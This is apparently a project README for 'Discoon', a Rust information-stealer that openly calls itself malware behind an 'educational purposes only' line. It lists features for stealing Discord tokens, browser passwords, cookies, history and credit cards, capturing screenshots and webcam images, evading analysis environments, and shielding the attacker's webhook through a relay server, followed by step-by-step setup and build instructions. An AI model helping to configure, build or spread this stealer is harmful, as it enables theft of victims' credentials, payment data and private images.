Discoon
Stealer with webhook protection
Educational purposes only
Only use this on your own machine and do not use it maliciously.
License
This project is licensed under the terms of the MIT license.
How it works
This is a malware written in Rust that steals the information the attacker chooses to steal and sends that through a server to the attacker's webhook.
Features
- Grab IP Address (
backend grabs the IP address
) - Anti analysis (
detects some malware analysis environments
) - Webhook protection (
sends to webhook through a backend making your webhook protected
) - Trace token (
sends new user token when they change user data also steals credit cards and login information
) - Steal discord tokens (
steal and decrypt discord tokens
) - Steal browser passwords (
steals browser passwords
) - Steal browser cookies (
steals browser cookies
) - Steal browsing history (
steals browsing history
) - Steal credit cards (
steals browser credit cards
) - Take screenshot (
takes a screenshot
) - Take webcam image (
takes a webcam image
)
How to use
- Open it in VS Code or your preferred IDE
- Goto
constants.rs
and find theWEBHOOK
field - Set the webhook to your webhook
- Get a webhost you can get a free one from here
- Get the
assets/upload.php
and upload it to your webhost - Change the
BACKEND
insrc/constants.rs
to yours - Get a 256-bit key and a 128-bit iv from here
- Convert both of them to base64 here
- Set the
key_bytes
andiv_bytes
to those values inencryption-macro/src/lib.rs
- Set the
$key
and$iv
to those values inupload.php
on your webhost - Set the options you want in
constants.rs
- Run (x64)
cargo build --release
or (x86)cargo build --release --target=i686-pc-windows-msvc
Contributing
- Fork it
- Create your branch (
git checkout -b my-change
) - Commit your changes (
git commit -am 'changed something'
) - Push to the branch (
git push origin my-change
) - Create new pull request